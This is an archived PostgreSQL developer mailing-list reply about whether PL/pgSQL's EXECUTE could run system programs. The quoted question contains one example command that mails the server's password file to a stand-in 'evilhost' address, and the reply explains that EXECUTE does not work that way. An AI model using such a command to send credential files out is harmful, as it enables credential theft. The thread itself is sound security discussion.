> > Huh? This would only be true if all operations inside plpgsql are
> > executed as superuser, which they are not. Seems to me the existing
> > defense against non-superuser using COPY is sufficient.
> Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to execute arbitrary code as postgres (system) user, right?
> If so, how can something like
> EXECUTE '/bin/mail badguy(at)evilhost < /usr/pgsql/data/pg_pwd';
> be avioded?
No, EXECUTE just passes a string down to SPI_exec() without
trying to prepare and save an execution plan for it. It's not
equivalent to system(3).
# It's easier to get forgiveness for being wrong than for being right. #
# Let's break this rule - forgive me. #
#================================================== JanWieck(at)Yahoo(dot)com #
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
In response to
pgsql-hackers by date
|Next:||From: KuroiNeko||Date: 2001-01-29 18:41:27|
|Subject: Re: Security hole in PL/pgSQL|
|Previous:||From: Jan Wieck||Date: 2001-01-29 18:12:47|
|Subject: Re: [SQL] Re: BLOB HOWTO??|